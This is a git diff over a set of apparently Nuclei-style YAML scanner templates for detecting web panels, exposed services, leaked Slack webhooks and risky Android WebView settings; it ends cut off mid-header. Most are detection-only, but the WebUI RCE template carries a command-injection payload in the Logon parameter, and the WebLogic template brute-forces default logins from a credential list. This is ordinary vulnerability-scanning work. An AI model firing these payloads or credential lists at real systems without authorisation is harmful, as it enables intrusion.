index 0000000000..48af8eb5d7 --- /dev/null +++ b/poc/web/sap-web-dispatcher-admin-portal-10071.yaml @@ -0,0 +1,32 @@ +id: sap-web-dispatcher-admin-portal +info: + name: SAP Web Dispatcher admin portal detection + author: randomstr1ng + severity: info + description: Detection of SAP Web Dispatcher Admin Portal + tags: sap,webserver,proxy +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/sap/wdisp/admin/public/default.html" + matchers-condition: and + matchers: + - type: word + part: header + condition: or + words: + - "Basic realm=\"WEB ADMIN\"" + - "SAP NetWeaver Application Server" + - type: status + condition: or + status: + - 401 + - 200 + - type: word + part: body + condition: or + words: + - "SAP Web Dispatcher" + - "Administration" diff --git a/poc/web/slack-webhook(1).yaml b/poc/web/slack-webhook(1).yaml new file mode 100644 index 0000000000..97548ae165 --- /dev/null +++ b/poc/web/slack-webhook(1).yaml @@ -0,0 +1,16 @@ +id: slack-webhook + +info: + name: Slack Webhook + author: gaurang + severity: high + tags: token,file,slack + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" diff --git a/poc/web/slack-webhook-11865.yaml b/poc/web/slack-webhook-11865.yaml deleted file mode 100644 index b1bdaf766c..0000000000 --- a/poc/web/slack-webhook-11865.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: slack-webhook -info: - name: Slack Webhook - author: gaurang - severity: high - tags: token,file,slack -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" diff --git a/poc/web/slack-webhook.yaml b/poc/web/slack-webhook.yaml index c44af0fefa..b1bdaf766c 100644 --- a/poc/web/slack-webhook.yaml +++ b/poc/web/slack-webhook.yaml @@ -1,5 +1,4 @@ id: slack-webhook - info: name: Slack Webhook author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" - -# digest: 4a0a0047304502206557ca925847e608d57b3a0bac581a2f51d85421f88fec1579e5cef728feabc8022100f97bae693d3bdf94877bac3c5e53bec9765196113fa213567d0ae28ec092a819:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/spark-webui-unauth-10401.yaml b/poc/web/spark-webui-unauth-10401.yaml new file mode 100644 index 0000000000..6ca1120cb0 --- /dev/null +++ b/poc/web/spark-webui-unauth-10401.yaml @@ -0,0 +1,26 @@ +id: spark-webui-unauth + +info: + name: Unauthenticated Spark WebUI + author: princechaddha + severity: medium + reference: + - https://github.com/vulhub/vulhub/tree/master/spark/unacc + tags: spark,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Spark Master at spark://" + - "<strong>URL:</strong>" + part: body + condition: and diff --git a/poc/web/spark-webui-unauth.yaml b/poc/web/spark-webui-unauth.yaml index 31a45c9631..a917ae6951 100644 --- a/poc/web/spark-webui-unauth.yaml +++ b/poc/web/spark-webui-unauth.yaml @@ -1,31 +1,22 @@ id: spark-webui-unauth - info: name: Unauthenticated Spark WebUI author: princechaddha severity: medium - reference: - - https://github.com/vulhub/vulhub/tree/master/spark/unacc - metadata: - max-request: 1 - tags: unauth,vulhub,spark - -http: + reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc + tags: spark,unauth +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "<title>Spark Master at spark://" - "<strong>URL:</strong>" part: body condition: and - -# digest: 4a0a004730450220270869b1b7fd1729ea28140dbf8a434ca5b2b341dd040852601e1b37cd1e8499022100942b17a3cf90e2d877e8ffed244ff81baa455305d50bfbf4e5c9f90ad08771e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/synology-web-station-10631.yaml b/poc/web/synology-web-station-10631.yaml index 637a740b03..a592c99a3d 100644 --- a/poc/web/synology-web-station-10631.yaml +++ b/poc/web/synology-web-station-10631.yaml @@ -1,33 +1,20 @@ id: synology-web-station - info: - name: Synology Web Station Page - Detect + name: Synology Web Station author: dhiyaneshDK severity: info - description: Synology Web Station page was detected. reference: - https://www.exploit-db.com/ghdb/7125 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: tech,synology,edb - -http: + tags: tech,synology +requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - '<title>Hello! Welcome to Synology Web Station!' - - type: status status: - 200 - -# digest: 4a0a0047304502207768a29f7b0beae42dce5f17479a2498e1f9fad755c7ea1942e4b8975aba33f90221008a5b09a2ae04dec5d695dff02c64e76372b39d9b422b45244180a1d2f69e917a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/synology-web-station-10632.yaml b/poc/web/synology-web-station-10632.yaml index 8bde0932a3..637a740b03 100644 --- a/poc/web/synology-web-station-10632.yaml +++ b/poc/web/synology-web-station-10632.yaml @@ -1,13 +1,21 @@ id: synology-web-station info: - name: Synology Web Station + name: Synology Web Station Page - Detect author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/7125 - tags: tech,synology + description: Synology Web Station page was detected. + reference: + - https://www.exploit-db.com/ghdb/7125 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: tech,synology,edb -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502207768a29f7b0beae42dce5f17479a2498e1f9fad755c7ea1942e4b8975aba33f90221008a5b09a2ae04dec5d695dff02c64e76372b39d9b422b45244180a1d2f69e917a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/web-config-11125.yaml b/poc/web/web-config-11125.yaml deleted file mode 100644 index 7c1e1b7f62..0000000000 --- a/poc/web/web-config-11125.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: web-config - -info: - name: Web Config file - author: Yash Anand @yashanand155 - severity: info - tags: config,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}/web.config' - - matchers-condition: and - matchers: - - type: word - words: - - - - - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/web/web-ftp-detect-11136.yaml b/poc/web/web-ftp-detect-11136.yaml deleted file mode 100644 index 6540382c6d..0000000000 --- a/poc/web/web-ftp-detect-11136.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: web-ftp-detect - -info: - name: Web FTP Detection - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7013 - metadata: - max-request: 1 - tags: webftp,tech,ftp - -http: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi" - - matchers-condition: and - matchers: - - type: word - words: - - "Web-FTP" - - "square login" - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100efcee6e66d7053086c4b8f4e4c3b35dfa35be3f7e41e8afdd72b0e66aabb7273022027d04d5e11387148b9587035d7b31e3483d7a6f8e447785a2eece21ef1314738:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/web-ftp-detect-11137.yaml b/poc/web/web-ftp-detect-11137.yaml index 03f7ce1fc3..646c4f7e98 100644 --- a/poc/web/web-ftp-detect-11137.yaml +++ b/poc/web/web-ftp-detect-11137.yaml @@ -1,23 +1,20 @@ -id: web-ftp-detect - -info: - name: Web FTP Detection - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7013 - tags: webftp,tech,ftp - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi" - - matchers-condition: and - matchers: - - type: word - words: - - "Web-FTP" - - "square login" - - type: status - status: - - 200 \ No newline at end of file +id: web-ftp-detect +info: + name: Web FTP Detection + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/7013 + tags: webftp,tech,ftp +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/upload/web-ftp.cgi" + matchers-condition: and + matchers: + - type: word + words: + - "Web-FTP" + - "square login" + - type: status + status: + - 200 diff --git a/poc/web/web-local-craft-11139.yaml b/poc/web/web-local-craft-11139.yaml new file mode 100644 index 0000000000..fda38c4136 --- /dev/null +++ b/poc/web/web-local-craft-11139.yaml @@ -0,0 +1,19 @@ +id: weblocal-craft-login +info: + name: Web local craft Terminal Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6800 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/home.html' + matchers-condition: and + matchers: + - type: word + words: + - 'WEB Local Craft Terminal' + - type: status + status: + - 200 diff --git a/poc/web/web-local-craft-11141.yaml b/poc/web/web-local-craft-11141.yaml deleted file mode 100644 index 1ac402b50e..0000000000 --- a/poc/web/web-local-craft-11141.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: weblocal-craft-login -info: - name: Web local craft Terminal Login - author: dhiyaneshDK - severity: info - reference: - - https://www.exploit-db.com/ghdb/6800 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/home.html' - matchers-condition: and - matchers: - - type: word - words: - - 'WEB Local Craft Terminal' - - type: status - status: - - 200 diff --git a/poc/web/web-service-panel.yaml b/poc/web/web-service-panel.yaml index 1e241b5a7f..9a30df6abd 100644 --- a/poc/web/web-service-panel.yaml +++ b/poc/web/web-service-panel.yaml @@ -1,33 +1,19 @@ id: web-service-panel - info: - name: Web Service Panel -Detect + name: WEB SERVICE Panel author: dhiyaneshDK severity: info - description: Web Service panel was detected. - reference: - - https://www.exploit-db.com/ghdb/7116 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: edb,panel,service - -http: + reference: https://www.exploit-db.com/ghdb/7116 + tags: panel,service +requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'WEB SERVICE' - - type: status status: - 200 - -# digest: 4a0a00473045022100c5cc44e49283a0b27782bca26dc69b8606e5b4bcedfb66abcd09cc24e3397bcd022002a91f2d20643990032e71f41916cbe69775ea4c852da9bfc8d9a9f1e3303129:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/web-suite-detect-11168.yaml b/poc/web/web-suite-detect-11168.yaml new file mode 100644 index 0000000000..33bf8280f2 --- /dev/null +++ b/poc/web/web-suite-detect-11168.yaml @@ -0,0 +1,36 @@ +id: web-suite-detect + +info: + name: Web Suite Detect + author: pikpikcu + severity: info + metadata: + fofa-query: "Web Suite 2021 Login" + tags: tech,web-suite + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/ws2020/" + - "{{BaseURL}}/ws2021/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'www.bqe.com">BQE Software Inc.' + - 'Web Suite' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "Version: (.*)" diff --git a/poc/web/web-suite-detect.yaml b/poc/web/web-suite-detect.yaml deleted file mode 100644 index 63881cf69f..0000000000 --- a/poc/web/web-suite-detect.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: web-suite-detect -info: - name: Web Suite Detect - author: pikpikcu - severity: info - metadata: - fofa-query: Web Suite 2021 Login - tags: tech,web-suite -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/ws2020/" - - "{{BaseURL}}/ws2021/" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'www.bqe.com">BQE Software Inc.' - - 'Web Suite' - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - "Version: (.*)" diff --git a/poc/web/webcamxp-5-11122.yaml b/poc/web/webcamxp-5-11122.yaml deleted file mode 100644 index 01ffef8b54..0000000000 --- a/poc/web/webcamxp-5-11122.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: webcamxp-5 - -info: - name: WebcamXP 5 Login Panel - Detect - author: dhiyaneshDK - severity: info - description: WebcamXP 5 login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/7448 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"webcamXP 5" - tags: iot,edb - -http: - - method: GET - path: - - '{{BaseURL}}/home.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'webcamXP 5' - - - type: status - status: - - 200 - -# digest: 490a0046304402202093e097b013ffa84a34fb92d7ea73483077f22fec6de3409dcb51f74e79fd7f022019bcc0302ac58911e1d921bb5d1476d23229a13895e1505b09ceecb1614e6dec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/webcamxp-5.yaml b/poc/web/webcamxp-5.yaml new file mode 100644 index 0000000000..4af1a58d72 --- /dev/null +++ b/poc/web/webcamxp-5.yaml @@ -0,0 +1,21 @@ +id: webcamxp-5 +info: + name: webcamXP 5 + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7448 + tags: iot + metadata: + shodan-query: 'http.title:"webcamXP 5"' +requests: + - method: GET + path: + - '{{BaseURL}}/home.html' + matchers-condition: and + matchers: + - type: word + words: + - 'webcamXP 5' + - type: status + status: + - 200 diff --git a/poc/web/webeditors-11129.yaml b/poc/web/webeditors-11129.yaml deleted file mode 100644 index 3e9bfb059c..0000000000 --- a/poc/web/webeditors-11129.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: webeditors -info: - name: Web Editors - author: princechaddha,bernardofsr - severity: info - tags: panel,webeditors -requests: - - method: GET - path: - - "{{BaseURL}}/fckeditor/_samples/default.html" - - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/uploadtest.html" - - "{{BaseURL}}/ckeditor/samples/" - - "{{BaseURL}}/editor/ckeditor/samples/" - - "{{BaseURL}}/ckeditor/samples/sample_posteddata.php" - - "{{BaseURL}}/editor/ckeditor/samples/sample_posteddata.php" - - "{{BaseURL}}/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" - - "{{BaseURL}}/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php" - - "{{BaseURL}}/ueditor/php/getRemoteImage.php" - matchers: - - type: word - words: - - "FCKeditor" - - "<title>CKEditor Samples" - - "http://ckeditor.com" - - "Custom Uploader URL:" - - "init_spell()" - - "'tip':'" - condition: or diff --git a/poc/web/webflow-takeover-11131.yaml b/poc/web/webflow-takeover-11131.yaml deleted file mode 100644 index b1667b35dc..0000000000 --- a/poc/web/webflow-takeover-11131.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: webflow-takeover -info: - name: webflow takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - -

    The page you are looking for doesn't exist or has been moved.

    diff --git a/poc/web/webflow-takeover-11133.yaml b/poc/web/webflow-takeover-11133.yaml new file mode 100644 index 0000000000..3fd3180be6 --- /dev/null +++ b/poc/web/webflow-takeover-11133.yaml @@ -0,0 +1,15 @@ +id: webflow-takeover +info: + name: webflow takeover detection + author: pdcommunity + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + -

    The page you are looking for doesn't exist or has been moved.

    diff --git a/poc/web/webflow-takeover.yaml b/poc/web/webflow-takeover.yaml index 3fd3180be6..b1667b35dc 100644 --- a/poc/web/webflow-takeover.yaml +++ b/poc/web/webflow-takeover.yaml @@ -1,7 +1,7 @@ id: webflow-takeover info: name: webflow takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/poc/web/weblogic-iiop-detect-11148.yaml b/poc/web/weblogic-iiop-detect-11148.yaml index 1aae2ded85..bf7d91dfc6 100644 --- a/poc/web/weblogic-iiop-detect-11148.yaml +++ b/poc/web/weblogic-iiop-detect-11148.yaml @@ -1,20 +1,16 @@ id: weblogic-iiop-detect - info: name: Detect Weblogic IIOP Protocol author: F1tz severity: info description: Check IIOP protocol status. tags: network,weblogic - network: - inputs: - data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}" - host: - "{{Hostname}}" read-size: 1024 - matchers-condition: and matchers: - type: word diff --git a/poc/web/weblogic-t3-detect-11151.yaml b/poc/web/weblogic-t3-detect-11151.yaml index b1a63e30be..fd503f75f3 100644 --- a/poc/web/weblogic-t3-detect-11151.yaml +++ b/poc/web/weblogic-t3-detect-11151.yaml @@ -1,7 +1,7 @@ id: weblogic-t3-detect info: name: Detect Weblogic T3 Protocol - author: F1tz + author: F1tz,milo2012,wdahlenb severity: info description: Check T3 protocol status. tags: network,weblogic @@ -15,3 +15,24 @@ network: - type: word words: - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" + - inputs: + - data: "t3s 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + host: + - "tls://{{Hostname}}" + read-size: 1024 + matchers: + - type: word + words: + - "HELO" + extractors: + - type: regex + part: body + group: 1 + regex: + - "HELO:(.*).false" diff --git a/poc/web/weblogic-t3-detect-11152.yaml b/poc/web/weblogic-t3-detect-11153.yaml similarity index 100% rename from poc/web/weblogic-t3-detect-11152.yaml rename to poc/web/weblogic-t3-detect-11153.yaml diff --git a/poc/web/weblogic-weak-login-11154.yaml b/poc/web/weblogic-weak-login-11154.yaml deleted file mode 100644 index 3cf788b3b9..0000000000 --- a/poc/web/weblogic-weak-login-11154.yaml +++ /dev/null @@ -1,68 +0,0 @@ -id: weblogic-weak-login - -info: - name: WebLogic Default Login - author: pdteam - description: WebLogic default login credentials were discovered. - severity: high - tags: default-login,weblogic - reference: - - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - -requests: - - raw: - - | - GET /console/ HTTP/1.1 - Host: {{Hostname}} - - - | - POST /console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8 - - attack: pitchfork - payloads: - username: - - weblogic - - weblogic - - weblogic - - weblogic - - weblogic - - admin - - admin - - system - - password: - - weblogic - - weblogic1 - - welcome1 - - Oracle@123 - - weblogic123 - - 12345678 - - security - - password - - stop-at-first-match: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/console/index.jsp" - - "ADMINCONSOLESESSION" - condition: and - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/web/weblogic-weak-login-11155.yaml b/poc/web/weblogic-weak-login-11155.yaml index 11d03f834a..454abb185f 100644 --- a/poc/web/weblogic-weak-login-11155.yaml +++ b/poc/web/weblogic-weak-login-11155.yaml @@ -1,18 +1,10 @@ id: weblogic-weak-login info: - name: WebLogic Default Login + name: WebLogic weak login author: pdteam - description: WebLogic default login credentials were discovered. severity: high tags: default-login,weblogic - reference: - - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password requests: - raw: - | @@ -57,5 +49,3 @@ requests: - type: status status: - 302 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/web/webmodule-ee-11162.yaml b/poc/web/webmodule-ee-11162.yaml new file mode 100644 index 0000000000..ab6ad7a796 --- /dev/null +++ b/poc/web/webmodule-ee-11162.yaml @@ -0,0 +1,19 @@ +id: webmodule-ee-detection +info: + name: Webmodule Detection + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/7001 + tags: webmodule-ee,tech +requests: + - method: GET + path: + - "{{BaseURL}}/webmodule-ee/login.seam" + matchers-condition: and + matchers: + - type: word + words: + - "Webmodule" + - type: status + status: + - 200 diff --git a/poc/web/webmodule-ee-11164.yaml b/poc/web/webmodule-ee-11164.yaml deleted file mode 100644 index b4aa17abf0..0000000000 --- a/poc/web/webmodule-ee-11164.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: webmodule-ee-detection - -info: - name: Webmodule Detection - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7001 - tags: webmodule-ee,tech - -requests: - - method: GET - path: - - "{{BaseURL}}/webmodule-ee/login.seam" - - matchers-condition: and - matchers: - - type: word - words: - - "Webmodule" - - type: status - status: - - 200 diff --git a/poc/web/webmodule-ee-panel-11160.yaml b/poc/web/webmodule-ee-panel-11161.yaml similarity index 100% rename from poc/web/webmodule-ee-panel-11160.yaml rename to poc/web/webmodule-ee-panel-11161.yaml diff --git a/poc/web/webmodule-ee.yaml b/poc/web/webmodule-ee.yaml index ab6ad7a796..3851830e33 100644 --- a/poc/web/webmodule-ee.yaml +++ b/poc/web/webmodule-ee.yaml @@ -5,6 +5,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7001 tags: webmodule-ee,tech + requests: - method: GET path: @@ -14,6 +15,7 @@ requests: - type: word words: - "Webmodule" + - type: status status: - 200 diff --git a/poc/web/webtools-home.yaml b/poc/web/webtools-home.yaml index 86f88c2502..a82b0b1183 100644 --- a/poc/web/webtools-home.yaml +++ b/poc/web/webtools-home.yaml @@ -1,27 +1,20 @@ id: webtools-home - info: name: Webtools Home author: dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Webtools" tags: iot - -http: + metadata: + shodan-query: 'http.title:"Webtools"' +requests: - method: GET path: - "{{BaseURL}}/wt2parser.cgi?home_en" - matchers-condition: and matchers: - type: word words: - 'WebTools | Home' - - type: status status: - 200 - -# digest: 4b0a00483046022100f3d6b75a7638a8769657a5da18f42513fd5adbe8220a9f58a13e6c00a144e09d02210089d21a4e51c19e50caab6f6e1dfa4465d9b6062bc1e341b31321780bbc40be4b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/webui-rce-11170.yaml b/poc/web/webui-rce-11170.yaml deleted file mode 100644 index 09b1d2e004..0000000000 --- a/poc/web/webui-rce-11170.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: webui-rce -info: - name: WebUI 1.5b6 RCE - author: pikpikcu - severity: critical - description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 - tags: webui,rce -requests: - - method: GET - path: - - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' - matchers-condition: and - matchers: - - type: word - words: - - "c5b3d7397a90f42d222f7ed9408c0dc6" - part: body - - type: status - status: - - 200 diff --git a/poc/web/webui-rce-11174.yaml b/poc/web/webui-rce-11174.yaml new file mode 100644 index 0000000000..952c3225ff --- /dev/null +++ b/poc/web/webui-rce-11174.yaml @@ -0,0 +1,20 @@ +id: webui-rce +info: + name: WebUI 1.5b6 RCE + author: pikpikcu + severity: critical + reference: https://www.exploit-db.com/exploits/36821 + tags: webui,rce +requests: + - method: GET + path: + - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' + matchers-condition: and + matchers: + - type: word + words: + - "c5b3d7397a90f42d222f7ed9408c0dc6" + part: body + - type: status + status: + - 200 diff --git a/poc/web/webui-rce.yaml b/poc/web/webui-rce.yaml index 952c3225ff..09b1d2e004 100644 --- a/poc/web/webui-rce.yaml +++ b/poc/web/webui-rce.yaml @@ -3,6 +3,7 @@ info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. reference: https://www.exploit-db.com/exploits/36821 tags: webui,rce requests: diff --git a/poc/web/webview-addjavascript-interface-11175.yaml b/poc/web/webview-addjavascript-interface-11175.yaml index 06e26a26dd..49c7786cd6 100644 --- a/poc/web/webview-addjavascript-interface-11175.yaml +++ b/poc/web/webview-addjavascript-interface-11175.yaml @@ -1,16 +1,13 @@ id: webview-addjavascript-interface - info: name: Webview addJavascript Interface Usage author: gaurang severity: info tags: android,file - file: - extensions: - all - matchers: - type: word words: - - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" \ No newline at end of file + - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" diff --git a/poc/web/webview-addjavascript-interface-11177.yaml b/poc/web/webview-addjavascript-interface-11176.yaml similarity index 100% rename from poc/web/webview-addjavascript-interface-11177.yaml rename to poc/web/webview-addjavascript-interface-11176.yaml diff --git a/poc/web/webview-javascript.yaml b/poc/web/webview-javascript.yaml index 22692eba77..026d8c3ec9 100644 --- a/poc/web/webview-javascript.yaml +++ b/poc/web/webview-javascript.yaml @@ -1,14 +1,8 @@ id: webview-javascript-enabled - info: - name: WebView JavaScript - Detect + name: Webview JavaScript enabled author: gaurang severity: info - description: WebView Javascript enabling was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 tags: android,file,javascript file: - extensions: @@ -17,6 +11,3 @@ file: - type: word words: - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" - -# Enhanced by md on 2023/05/03 -# digest: 490a0046304402202cb44b3b176f00694b16cac7a61f5db343e65232d7dbb0e4c3f19815322ffa30022041f4229478a122c2b2f3b7878815a3391f9725e527b8eb7c18488d0c958b3324:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/webview-load-url-11180.yaml b/poc/web/webview-load-url-11180.yaml new file mode 100644 index 0000000000..a45be3958b --- /dev/null +++ b/poc/web/webview-load-url-11180.yaml @@ -0,0 +1,13 @@ +id: webview-load-url +info: + name: Webview loadUrl usage + author: gaurang + severity: info + tags: android,file +file: + - extensions: + - all + matchers: + - type: word + words: + - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" diff --git a/poc/web/webview-load-url-11182.yaml b/poc/web/webview-load-url-11182.yaml deleted file mode 100644 index c0e2a25607..0000000000 --- a/poc/web/webview-load-url-11182.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: webview-load-url -info: - name: Webview loadUrl usage - author: gaurang - severity: info -file: - - extensions: - - all - matchers: - - type: word - words: - - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" diff --git a/poc/web/webview-universal-access-11183.yaml b/poc/web/webview-universal-access-11183.yaml index 56fe5fb8ac..11b8a99339 100644 --- a/poc/web/webview-universal-access-11183.yaml +++ b/poc/web/webview-universal-access-11183.yaml @@ -1,16 +1,13 @@ id: webview-universal-access - info: name: Webview Universal Access enabled author: gaurang severity: medium tags: android,file - file: - extensions: - all - matchers: - type: word words: - - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" \ No newline at end of file + - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" diff --git a/poc/web/webview-universal-access.yaml b/poc/web/webview-universal-access.yaml index 2497ace769..56fe5fb8ac 100644 --- a/poc/web/webview-universal-access.yaml +++ b/poc/web/webview-universal-access.yaml @@ -1,22 +1,16 @@ id: webview-universal-access info: - name: Android WebView Universal Access - Detect + name: Webview Universal Access enabled author: gaurang severity: medium - description: Android WebView Universal Access enabling was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 tags: android,file + file: - extensions: - all + matchers: - type: word words: - - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" - -# Enhanced by md on 2023/05/03 -# digest: 4a0a00473045022100a47e2082fc66a04948c89867eea66d41624cf5a26a7e0e6faebecd5e18281a74022025ef3b1093b7cfa7eeb45aea5a30518577674355526f2621c96bde80d175642a:922c64590222798bb761d5b6d8e72950 + - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" \ No newline at end of file diff --git a/poc/web/xp-webcam.yaml b/poc/web/xp-webcam.yaml deleted file mode 100644 index f225f44ead..0000000000 --- a/poc/web/xp-webcam.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: xp-webcam -info: - name: XP Webcam Viewer Page - author: aashiq - severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body - tags: webcam,iot -requests: - - method: GET - path: - - "{{BaseURL}}/mobile.html" - matchers-condition: and - matchers: - - type: word - words: - - "webcams and ip cameras server for windows" - part: body - - type: word - words: - - "Please provide a valid username/password to access this server." - part: body - negative: true diff --git a/poc/web/zoho-webhook-token-11835.yaml b/poc/web/zoho-webhook-token-11835.yaml index 7dd146b904..f3aa557a4a 100644 --- a/poc/web/zoho-webhook-token-11835.yaml +++ 